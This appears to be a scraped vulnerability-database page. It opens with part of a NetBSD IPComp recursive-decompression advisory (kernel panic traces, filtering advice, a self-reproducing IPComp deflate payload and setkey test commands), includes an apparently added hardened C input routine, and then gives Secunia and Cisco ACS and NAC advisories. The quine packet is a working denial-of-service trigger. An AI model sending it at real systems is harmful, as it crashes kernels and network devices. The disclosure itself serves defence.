    Mar 25 05:34:40 /netbsd: trap type 6 code 0 eip c06e6c90 cs 8 eflags 10246 cr2 8 ilevel 0
    Mar 25 05:34:40 /netbsd: panic: trap
    Mar 25 05:34:40 /netbsd: Faulted in mid-traceback; aborting...

Adjust depth as required.
    (gdb) bt
    #0  ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:112
    #1  0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
    #2  0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
    #3  0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
    #4  0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
    #5  0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
    #6  0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
    [ trimmed ]
    #148 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
    #149 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248
    #150 0xc0162bbb in ip_input (m=0xc14e1300) at ../../../../netinet/ip_input.c:1059
    #151 0xc0161b82 in ipintr () at ../../../../netinet/ip_input.c:476
    #152 0xc05d6248 in softint_execute (si=0xca79e154, l=0xca7a7a00, s=4) at ../../../../kern/kern_softint.c:539
    #153 0xc05d60e6 in softint_dispatch (pinned=0xca7a7500, s=4) at ../../../../kern/kern_softint.c:811
    (gdb) info frame
    Stack level 0, frame at 0xcab9bf08:
     eip = 0xc01ebd5c in ipcomp4_input (../../../../netinet6/ipcomp_input.c:112); saved eip 0xc01ec302
     called by frame at 0xcab9bfa8
     source language c.
     Arglist at 0xcab9bf00, args: m=0xc14e1300
     Locals at 0xcab9bf00, Previous frame's sp is 0xcab9bf08
     Saved registers:
      ebx at 0xcab9bef8, ebp at 0xcab9bf00, esi at 0xcab9befc, eip at 0xcab9bf04
    (gdb) info target
    Symbols from "netbsd.gdb".
    Remote serial target in gdb-specific protocol:
    Debugging a target over a serial line.

Therefore, an oob sp will write attacker controlled data.

    (gdb) tb panic
    Temporary breakpoint 2, panic (fmt=0xc0acf54b "trap") at ../../../../kern/subr_prf.c:184
    184         kpreempt_disable();
    (gdb) bt
    #0  panic (fmt=0xc0acf54b "trap") at ../../../../kern/subr_prf.c:184
    #1  0xc06f0919 in trap (frame=0xcac49f84) at ../../../../arch/i386/i386/trap.c:368
    #2  0xc06f0566 in trap_tss (tss=0xc0cfe5ec, trapno=13, code=0) at ../../../../arch/i386/i386/trap.c:197
    #3  0xc010cb1b in ?? ()
    (gdb) frame 1
    (gdb) info symbol frame->tf_eip

etc.

------------------- Mitigation -----------------------

*******************************************************************************
* Please note, this document is intended for security professionals, network  *
* or systems administrators, and vendors of network equipment and software.   *
* End users need not be concerned.                                            *
*******************************************************************************

For numerous reasons, it is a good idea to filter IPComp at the perimeter if it is not expected. Even when implemented correctly, IPComp completely defeats the purpose of Delayed Compression in OpenSSH (see CAN-2005-2096 for an example of why you always want delayed compression). Additionally, the encapsulation means any attacks that require link-local access can simply be wrapped in ipcomp and are then routable (that is not good).

Affected servers and devices can use packet filtering to prevent the vulnerable code from being exercised. On systems with ipfw, a rule based on the following ipfw/ipfw6 template can be used; adjust it to whitelist expected peers as appropriate.

    # ipfw add deny proto ipcomp

On other BSD systems, pfctl rules can be substituted. See vendor documentation for how to configure network appliances to deny IPComp at network boundaries.

------------------- Solution -----------------------

I would recommend vendors disallow nested encapsulation of ipcomp payloads. The implementation of this fix will of course vary by product.
By the time you read this advisory, a fix should have been committed to the NetBSD repository; downstream consumers of NetBSD code are advised to import the changes urgently. A draft patch from S.P.Zeidler of the NetBSD project is attached for reference.

------------------- Credit -----------------------

This bug was discovered by Tavis Ormandy.

------------------- Greetz -----------------------

Greetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert, Asirap, Meder, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D., djm, Brian C., djrbliss, jono, and all my other elite friends and colleagues. And of course, $1$kk1q85Xp$Id.gAcJOg7uelf36VQwJQ/.

Additional thanks to Jan, Felix and Meder for their mad xnu skillz. Jan helps organize a security conference called #days held in Lucerne, Switzerland (a very picturesque Swiss city). The CFP is currently open, you should check it out at https://www.hashdays.ch/.

------------------- Notes -----------------------

An elegant method of reproducing this flaw would be using self-reproducing Lempel-Ziv programs; rsc describes the technique here: http://research.swtch.com/2010/03/zip-files-all-way-down.html

This method would also be able to disrupt non-recursive implementations that do not prevent nested encapsulation, such as modern FreeBSD and OpenBSD. An ipcomp quine is defined below in GNU C syntax, and a testcase for Linux is attached to this mail.
    struct {
        uint8_t  comp_nxt;        // Next Header
        uint8_t  comp_flags;      // Reserved, must be zero
        uint16_t comp_cpi;        // Compression parameter index
        uint8_t  comp_data[180];  // Payload
    } ipcomp = {
        .comp_nxt   = IPPROTO_COMP,
        .comp_flags = 0,
        .comp_cpi   = htons(IPCOMP_DEFLATE),
        .comp_data  = {
            0xca, 0x61, 0x60, 0x60, 0x02, 0x00, 0x0a, 0x00, 0xf5, 0xff,
            0xca, 0x61, 0x60, 0x60, 0x02, 0x00, 0x0a, 0x00, 0xf5, 0xff,
            0x02, 0xb3, 0xc0, 0x2c, 0x00, 0x00, 0x05, 0x00, 0xfa, 0xff,
            0x02, 0xb3, 0xc0, 0x2c, 0x00, 0x00, 0x05, 0x00, 0xfa, 0xff,
            0x00, 0x05, 0x00, 0xfa, 0xff, 0x00, 0x14, 0x00, 0xeb, 0xff,
            0x02, 0xb3, 0xc0, 0x2c, 0x00, 0x00, 0x05, 0x00, 0xfa, 0xff,
            0x00, 0x05, 0x00, 0xfa, 0xff, 0x00, 0x14, 0x00, 0xeb, 0xff,
            0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff,
            0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff,
            0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff,
            0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff,
            0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
            0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x0f, 0x00, 0xf0, 0xff,
            0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
            0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x0f, 0x00, 0xf0, 0xff,
            0x82, 0x72, 0x61, 0x5c, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
            0x01, 0x00, 0x00, 0xff, 0xff, 0x82, 0x72, 0x61, 0x5c, 0x00,
            0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0xff, 0xff
        }
    };

Note that modern FreeBSD and OpenBSD appear to drop incoming ipcomp packets if no TBD entries are known (see netstat -s -p ipcomp statistics, and the setkey documentation). You will have to allow for this while testing. Depending on implementation, you may also need to spoof the source address of a peer, see man 7 raw. Special thanks to rsc and Matthew Dempsky for hints and assistance.
Something like this may be useful for testing:

    # setkey -c
    add 192.168.0.1 192.168.0.2 ipcomp 0002 -C deflate
    ^D

- I would advise caution when sending malformed or pathological packets across critical infrastructure or the public internet; many embedded devices are based on BSD-derived code and may not handle the error gracefully.

- Julien will be angry I didn't use scapy, sorry! I am a fan :-)

- A bug in Xnu's custom allocator for zlib (deflate_alloc) causes zlib initialisation to fail if ~1k bytes is not available to MALLOC() with M_NOWAIT, even though M_WAITOK was intended, as described in the comments:

      /*
       * Avert your gaze, ugly hack follows!
       * We init here so our malloc can allocate using M_WAIT.
       * We don't want to allocate if ipcomp isn't used, and we
       * don't want to allocate on the input or output path.
       * Allocation fails if we use M_NOWAIT because init allocates
       * something like 256k (ouch).
       */

  However, with some creativity it is possible to make the allocation succeed. You can observe this bug by sending an ipcomp packet and looking for the memory allocation failure in the network statistics (try something like `netstat -s | grep -A16 ipsec:`). You can also set `sysctl -w net.inet.ipsec.debug=1`.
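The NetBSD/KAME dispatch code quoted earlier hands a decompressed payload straight back to the IPComp handler whenever comp_nxt is 108, which is what both the nested test case and the quine in the Notes rely on. The following is an added example, not NetBSD's, Xnu's or the advisory author's code, of the Solution section's recommendation: an input path that unwraps one layer and drops anything whose next header is IPComp again, plus a bounded nesting counter of the kind an iterative stack or an IDS can use. Assumptions: a stored-block-only DEFLATE decoder stands in for zlib, IPCOMP_MAX_OUT is a made-up decompression budget, and the two packets are constructed for the test.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Values from the advisory: IP protocol 108 is IPComp, CPI 2 is DEFLATE.
 * IPCOMP_MAX_OUT is a hypothetical per-layer decompression budget. */
#define IPPROTO_COMP_NUM 108
#define IPCOMP_DEFLATE   2
#define IPCOMP_MAX_OUT   4096

enum ipcomp_verdict { IPCOMP_DELIVER, IPCOMP_DROP_NESTED, IPCOMP_DROP_MALFORMED };

/* Raw-DEFLATE decoder for stored blocks only (BTYPE 00, what zlib emits at
 * Z_NO_COMPRESSION); other block types are rejected. A real stack calls zlib. */
static bool inflate_stored(const uint8_t *in, size_t inlen,
                           uint8_t *out, size_t outcap, size_t *outlen)
{
    size_t pos = 0, o = 0;
    bool final = false;
    while (!final) {
        if (pos >= inlen) return false;
        uint8_t hdr = in[pos++];                 /* bit 0 = BFINAL, bits 1-2 = BTYPE */
        final = hdr & 1;
        if (((hdr >> 1) & 3) != 0) return false;
        if (pos + 4 > inlen) return false;       /* LEN and NLEN follow, little-endian */
        uint16_t len  = (uint16_t)(in[pos] | (in[pos + 1] << 8));
        uint16_t nlen = (uint16_t)(in[pos + 2] | (in[pos + 3] << 8));
        pos += 4;
        if ((uint16_t)~len != nlen) return false;
        if (pos + len > inlen || o + len > outcap) return false;
        memcpy(out + o, in + pos, len);
        pos += len; o += len;
    }
    *outlen = o;
    return true;
}

/* Hardened input path: unwrap exactly one IPComp layer and refuse to hand the result
 * back to the IPComp handler. Rejecting comp_nxt == IPComp before decompressing also
 * stops the quine from the Notes section from ever being inflated. */
enum ipcomp_verdict ipcomp_input_hardened(const uint8_t *pkt, size_t len, uint8_t *out,
                                          size_t outcap, size_t *outlen, uint8_t *next_proto)
{
    if (len < 4) return IPCOMP_DROP_MALFORMED;
    uint8_t nxt = pkt[0], flags = pkt[1];
    uint16_t cpi = (uint16_t)((pkt[2] << 8) | pkt[3]);     /* network byte order */
    if (flags != 0 || cpi != IPCOMP_DEFLATE) return IPCOMP_DROP_MALFORMED;
    if (nxt == IPPROTO_COMP_NUM) return IPCOMP_DROP_NESTED;  /* no IPComp-in-IPComp */
    if (!inflate_stored(pkt + 4, len - 4, out, outcap, outlen)) return IPCOMP_DROP_MALFORMED;
    *next_proto = nxt;
    return IPCOMP_DELIVER;
}

/* Detection-side helper: count the IPComp layers a packet unwraps, bounded by
 * max_depth so a self-reproducing payload cannot keep the loop busy forever. */
unsigned ipcomp_nesting_depth(const uint8_t *pkt, size_t len, unsigned max_depth)
{
    uint8_t bufa[IPCOMP_MAX_OUT], bufb[IPCOMP_MAX_OUT];
    uint8_t *scratch = bufa, *other = bufb;
    const uint8_t *cur = pkt;
    size_t curlen = len, outlen;
    unsigned depth = 0;
    while (depth < max_depth) {
        if (curlen < 4 || (uint16_t)((cur[2] << 8) | cur[3]) != IPCOMP_DEFLATE) break;
        if (!inflate_stored(cur + 4, curlen - 4, scratch, IPCOMP_MAX_OUT, &outlen)) break;
        depth++;
        if (cur[0] != IPPROTO_COMP_NUM) break;   /* inner protocol is not IPComp: done */
        cur = scratch; curlen = outlen;          /* next layer reads what was just written */
        uint8_t *t = scratch; scratch = other; other = t;
    }
    return depth;
}

/* Constructed packets: one IPComp layer carrying six payload bytes as a stored
 * block (comp_nxt = 6), and that same packet wrapped in a second layer (comp_nxt = 108). */
static const uint8_t single_pkt[] = { 6, 0, 0, 2, 0x01, 6, 0, 0xf9, 0xff,
                                      0x45, 0x00, 0x00, 0x14, 0x12, 0x34 };
static const uint8_t nested_pkt[] = { 108, 0, 0, 2, 0x01, 15, 0, 0xf0, 0xff,
                                      6, 0, 0, 2, 0x01, 6, 0, 0xf9, 0xff,
                                      0x45, 0x00, 0x00, 0x14, 0x12, 0x34 };

struct ipcomp_demo { enum ipcomp_verdict single, nested, badflags; uint8_t single_next;
                     size_t single_len; unsigned single_depth, nested_depth; };

/* Runs every check over the constructed packets, with no network involved. */
struct ipcomp_demo ipcomp_run_demo(void)
{
    uint8_t out[64], bad[sizeof single_pkt], next;
    size_t outlen;
    struct ipcomp_demo d;
    memcpy(bad, single_pkt, sizeof bad);
    bad[1] = 0x80;                               /* reserved flags byte must be zero */
    d.single   = ipcomp_input_hardened(single_pkt, sizeof single_pkt, out, sizeof out, &d.single_len, &d.single_next);
    d.nested   = ipcomp_input_hardened(nested_pkt, sizeof nested_pkt, out, sizeof out, &outlen, &next);
    d.badflags = ipcomp_input_hardened(bad, sizeof bad, out, sizeof out, &outlen, &next);
    d.single_depth = ipcomp_nesting_depth(single_pkt, sizeof single_pkt, 16);
    d.nested_depth = ipcomp_nesting_depth(nested_pkt, sizeof nested_pkt, 16);
    return d;
}
```

The single-layer packet is delivered to protocol 6 with its six payload bytes, the wrapped copy is dropped as nested before any decompression, and the depth counter reports 1 and 2 respectively.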
------------------- References -----------------------

- http://research.swtch.com/2010/03/zip-files-all-way-down.html
  research!rsc: Zip Files All The Way Down
- http://tools.ietf.org/html/rfc3173
  RFC3173: IP Payload Compression Protocol (IPComp)
- http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netinet6/ipcomp_input.c?rev=1.36&content-type=text/x-cvsweb-markup&only_with_tag=MAIN
  NetBSD: ipcomp_input.c, v1.36
- http://www.opensource.apple.com/source/xnu/xnu-1456.1.26/bsd/netinet6/ipcomp_input.c
  Xnu: ipcomp_input.c
- http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man8/ipfw.8.html
  ipfw -- IP firewall and traffic shaper control program
- http://www.netbsd.org/docs/network/pf.html
  The NetBSD Packet Filter (generally applies to other popular BSDs).
- http://fxr.watson.org/fxr/source/netinet6/ipcomp_input.c?v=FREEBSD64#L222
  Earlier versions of FreeBSD were implemented recursively; the code has since been refactored.
- http://fxr.watson.org/fxr/source/netipsec/xform_ipcomp.c?v=FREEBSD81#L299
  The current version is implemented iteratively (see NOTES section on Quine DoS).
- http://www.force10networks.com/products/ftos.asp
  FTOS - Force10 Operating System
- http://www.qnx.com/developers/docs/6.4.1/io-pkt_en/user_guide/drivers.html
  QNX Network Drivers Documentation

Support high-quality journalism in information security by subscribing to LWN http://lwn.net/ (I have no connection to lwn other than appreciating their work). I have a twitter account where I occasionally comment on security topics. http://twitter.com/taviso

--
-------------------------------------
taviso@cmpxchg8b.com | pgp encrypted mail preferred
-------------------------------------------------------
----------------------------------------------------------------------
Secunia Research and vulnerability disclosures coordinated by Secunia: http://secunia.com/research/
----------------------------------------------------------------------

TITLE: NetBSD IPComp Payload Decompression Stack Overflow Vulnerability

SECUNIA ADVISORY ID: SA43969

VERIFY ADVISORY:
Secunia.com http://secunia.com/advisories/43969/
Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43969

RELEASE DATE: 2011-04-01

DISCUSS ADVISORY: http://secunia.com/advisories/43969/#comments

AVAILABLE ON SITE AND IN CUSTOMER AREA: Last Update, Popularity, Comments, Criticality Level, Impact, Where, Solution Status, Operating System / Software, CVE Reference(s) http://secunia.com/advisories/43969/

ONLY AVAILABLE IN CUSTOMER AREA: Authentication Level, Report Reliability, Secunia PoC, Secunia Analysis, Systems Affected, Approve Distribution, Remediation Status, Secunia CVSS Score, CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43969

ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: Automated scanning http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/

DESCRIPTION: Tavis Ormandy has reported a vulnerability in NetBSD, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

SOLUTION: Fixed in the CVS repository. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

PROVIDED AND/OR DISCOVERED BY: Tavis Ormandy

ORIGINAL ADVISORY: http://www.openwall.com/lists/oss-security/2011/04/01/1

OTHER REFERENCES, DEEP LINKS, EXTENDED DESCRIPTION, EXTENDED SOLUTION, EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

----------------------------------------------------------------------
About: This Advisory was delivered by Secunia as a free service to help private users keep their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
----------------------------------------------------------------------
VAR-201104-0077 CVE-2011-0951 Cisco Secure Access Control System (ACS) Unauthorized Password Change Security Bypass Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The web-based management interface in Cisco Secure Access Control System (ACS) 5.1 before 5.1.0.44.6 and 5.2 before 5.2.0.26.3 allows remote attackers to change arbitrary user passwords via unspecified vectors, aka Bug ID CSCtl77440. This issue is tracked as Cisco Bug ID CSCtl77440. A remote third party may change the password of any user. This vulnerability cannot be used to change the password of the following type of user account: (1) an account defined on an external identity store such as a Lightweight Directory Access Protocol (LDAP) server, Microsoft Active Directory Server, RSA SecureID server, or external RADIUS server. An attacker can exploit this issue to change a user's password, thereby aiding in further attacks.

----------------------------------------------------------------------
Secunia Research and vulnerability disclosures coordinated by Secunia: http://secunia.com/research/
----------------------------------------------------------------------

TITLE: Cisco Secure Access Control System Password Change Vulnerability

SECUNIA ADVISORY ID: SA43924

VERIFY ADVISORY:
Secunia.com http://secunia.com/advisories/43924/
Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43924

RELEASE DATE: 2011-03-31

DISCUSS ADVISORY: http://secunia.com/advisories/43924/#comments

DESCRIPTION: A vulnerability has been reported in Cisco Secure Access Control System, which can be exploited by malicious people to bypass certain security restrictions.

SOLUTION: Apply patches. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.

ORIGINAL ADVISORY: cisco-sa-20110330-acs: http://www.cisco.com/warp/public/707/cisco-sa-20110330-acs.shtml
----------------------------------------------------------------------

Successful exploitation requires the user account to be defined on the internal identity store. Cisco has released free software updates that address this vulnerability. There is no workaround for this vulnerability. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20110330-acs.shtml.
Affected Products
=================

Vulnerable Products
+------------------

The following Cisco Secure ACS versions are affected by this vulnerability:

* Cisco Secure ACS version 5.1 with patch 3, 4, or 5 (or any combination of these patches) installed and without patch 6 or later installed
* Cisco Secure ACS version 5.2 without any patches installed
* Cisco Secure ACS version 5.2 with patch 1 or 2 (or both of these patches) installed and without patch 3 or later installed

The previous list applies to both the hardware appliance and the software-only versions of the product.

The following methods can be used to determine which version of the Cisco Secure ACS is installed:

* From the Cisco Secure ACS command-line interface (CLI), issue the "show version" command, as shown in the following example:

    acs51a/admin# show version

    Cisco Application Deployment Engine OS Release: 1.2
    ADE-OS Build Version: 1.2.0.152
    ADE-OS System Architecture: i386

    Copyright (c) 2005-2009 by Cisco Systems, Inc.
    All rights reserved.
    Hostname: acs51a

    Version information of installed applications
    ---------------------------------------------

    Cisco ACS VERSION INFORMATION
    -----------------------------
    Version : 5.1.0.44.6
    Internal Build ID : B.2347
    Patches :
     5-1-0-44-3
     5-1-0-44-6

    acs51a/admin#

* On the main login page of the Cisco Secure ACS web-based interface, the version information is displayed on the left side of the screen.

The presence of an additional digit after the version number indicates the highest patch level installed. The absence of any additional digit after the version string indicates a Cisco Secure ACS version with no patches installed.

No other Cisco products are currently known to be affected by this vulnerability. Successful exploitation requires the user account to be defined on the internal identity store.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss

* CSCtl77440 ("Able to arbitrarily change user account passwords")
CVSS Base Score - 5.0
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - Partial
Availability Impact - None
CVSS Temporal Score - 4.4
Exploitability - High
Remediation Level - Official-Fix
Report Confidence - Confirmed

Impact
======
Successful exploitation of this vulnerability could allow an attacker to change the password of any user account that is defined on the internal identity store. Because the user would not know the new password, the attacker could also prevent a user from authenticating.

Software Versions and Fixes
===========================
When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release.
If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

Workarounds
===========
Customers can implement the UCP functionality through either a web-based front-end application or a scripting interface. Because this access would allow exploitation of the vulnerability described in this advisory, both of the following recommendations apply:
* Stop providing UCP services
* Do not include any computer that offers UCP services (either web-based or scripted) in the set of management stations that are allowed to access the ACS server

Obtaining Fixed Software
========================
Cisco has released free software updates that address this vulnerability. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.

Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.

Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. This vulnerability was found during internal testing.

Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

Distribution
============
This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20110330-acs.shtml
In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

Revision History
================
| Revision 1.0 | 2011-March-30 | Initial public release. |
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt.
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
Updated: Mar 30, 2011
Document ID: 112913
VAR-201103-0074 CVE-2011-0963 Cisco Network Access Control (NAC) Guest Server RADIUS Authentication Bypass Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The default configuration of the RADIUS authentication feature on the Cisco Network Admission Control (NAC) Guest Server with software before 2.0.3 allows remote attackers to bypass intended access restrictions and obtain network connectivity via unspecified vectors, aka Bug ID CSCtj66922. Because of this default configuration, a third party may bypass access restrictions and establish a network connection. The misconfiguration allows unauthenticated users to access the protected network: authentication can be bypassed without a legitimate username and password. Successfully exploiting this issue may lead to other attacks. This issue is tracked by Cisco Bug ID CSCtj66922. Cisco has released free software updates that address this vulnerability.

Vulnerable Products
+------------------
Cisco NAC Guest Server software versions prior to 2.0.3 are affected. The software version is displayed on the login page of the web server.

Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by this vulnerability.

Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss

* CSCtj66922 - Authentication Bypass Vulnerability
CVSS Base Score - 5.0
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Partial
Integrity Impact - None
Availability Impact - None
CVSS Temporal Score - 4.1
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed

Impact
======
Successful exploitation of the vulnerability may allow unauthorized users to access the protected network.

Software Versions and Fixes
===========================
When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.
Cisco NAC Guest Server software versions prior to 2.0.3 are affected by this vulnerability; 2.0.3 and later contain the fix.

Workarounds
===========
The following commands modify the RADIUS configuration file and restart the RADIUS daemon so that it reads the new configuration. Run them from the command-line interface (CLI) of the device:

# cp /etc/raddb/radiusd.conf /etc/raddb/radiusd.conf.orig
# sed -i 's/php -f/php/g' /etc/raddb/radiusd.conf
# service radiusd restart

Obtaining Fixed Software
========================
Cisco has released free software updates that address this vulnerability.
The latest version of Cisco NAC Guest Access Server system software may be obtained at: http://www.cisco.com/cisco/software/release.html?mdfid=282450822&flowid=4363&softwareid=282562545
Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with contracts should obtain upgraded software through their regular update channels; customers without a Cisco service contract should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC) using the contact details given above.

Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory.

Status of this Notice: FINAL
============================

Distribution
============
This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20110330-nac.shtml
Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

Revision History
================
| Revision 1.0 | 2011-March-30 | Initial public release. |

Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
